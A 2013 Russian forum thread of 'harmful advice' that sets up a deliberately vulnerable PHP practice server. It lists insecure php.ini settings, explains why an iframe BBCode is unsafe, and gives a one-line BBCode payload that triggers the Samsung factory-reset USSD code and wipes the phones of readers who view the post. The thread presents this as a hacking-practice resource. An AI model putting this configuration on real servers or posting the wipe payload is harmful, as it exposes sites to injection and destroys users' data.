Вредные советы или полигон для хакеров

Тема в разделе "Хостинг и настройка серверов", создана пользователем X-Shar, 10 июл 2013.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    В этой теме выкладываем советы, как сделать систему уязвимой к хакерским атакам, да-да это не опечатка, для чего это нужно:

    1)Для атак (Dmeh-Smeh-Smeh!!! ), на самом деле очень полезно как для безопасника, т.к. позволит определить например, как будет вести себя система в случае успешно атаки...

    Хакеру-же отличный полигон для тренировок !

    Это полезно также новичкам, которые настраивают свои сервера, а вдруг у вас так и настроено всё...Отдыхай!!!

    Тренироваться лучше на локалхосте, например Денвер (http://ru-sphere.ru/threads/Устанав...-сервер-на-свой-компьютер-аля-virtualbox.557/), можно на других...

    Итак начну:

    Что-бы было камельфо, нужно внести некоторые изменения в конфигурацию нашего сервера, а именно интерпретатора php !big010101

    Откройте конфигурационный файл php.ini, найдите и отредактируйте указанные ниже директивы:

    Выкладываю с комментариями:

    Код:
    register_globals=ON ; глобализация переменных - потенциальная брешь в безопасности
    magic_quotes=OFF ; отключаем магические кавычки для GET/POST/COOKIE - благоприятствует SQL-injection и позволяет использовать нуль-байт в инклудах
    magic_quotes_runtime=OFF ; благоприятствует SQL-injection
    magic_quotes_sybase=OFF ; благоприятствует SQL-injection
    mysql.trace_mode=ON ; включает показ ошибок Mysql
    allow_url_fopen=ON ; разрешает удаленное открытие файлов файловыми функциями
    allow_url_include=ON ; разрешает удаленно инклудить файлы
    error_reporting=E_ALL ; показ всех ошибок
    disable_functions= ; никаких ограничений
    safe_mode=OFF ; никаких ограничений
    open_basedir= ; никаких ограничений
    sql.safe_mode=OFF ;
    Далее перезагружаем сервак, а что-бы было вообще круто, ищем какой-нибудь скриптик по старей, желательно форум или CSM, далее выкладываем своё творение на хакзону, или античат, с нехорошими комментариями и ждём, будет круто...so happy

    Это была шутка, ну а если серьёзно:

    Внимание! Данная конфигурация сервера способствует проявлению множества критических уязвимостей веб-приложений и снижает его защищённость. Используйте данную конфигурацию только для тестирования уязвимостей веб приложений и только на localhost-сервере.

    В общем понятно в этой теме делимся ещё "Советами", пытаемся взломать такую систему и делимся результатами своей работы, хи-хи ! Отдыхай!!!
     
    • Мне нравится Мне нравится x 7
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Есть ещё один вредный совет для форумов, таких популярных движков как phpbb3, XenForo, Vbulletin и т.д.:

    Многие "Эксперты" дают рекомендации вставлять например видео с ВКонтакте при помощи BBCode:
    Код:
    [vkontakte]{TEXT}[/vkontakte] 
    с заменой HTML, с использованием скрытого фрейма т.е. примерно такой код:
    Код:
    <iframe src="{TEXT}" width="607" height="360" frameborder="0"></iframe>
    Данный код отлично выполняет свою задачу, но человек даже с небольшим опытом в HTML должен сразу заметить, что этот код опасен и уязвим. По сути он позволяет встроить в сообщение фрейм с абсолютно любой ссылкой. Многим злоумышленникам только это и нужно. Обычно после взлома сайта первым делом они встраивают скрытые фреймы, в которые загружается код, пытающийся заразить машины всех ваших пользователей через известные уязвимости. То есть установив такой BBCode вы избавите хакеров от необходимости взламывать ваш сайт — всё и так уже готово.

    Можно делать с таким форумом, что захотите, использовать различные уязвимости, вот например из весёлых:

    Уязвимость в Андройде старая правда, но прикольная одна строка HTML кода может удалить данные или перезагрузить телефоны Samsung:http://habrahabr.ru/post/152209/

    Достаточно запостить такой код:
    Код:
    [vkontakte]tel:*2767*3855%23[/vkontakte]
    Стоит только попытаться прочесть это сообщение с уязвимого устройства — и все ваши данные будут уничтожены !!!wacko88 ohmy88 wink1
     
    • Мне нравится Мне нравится x 3

Поделиться этой страницей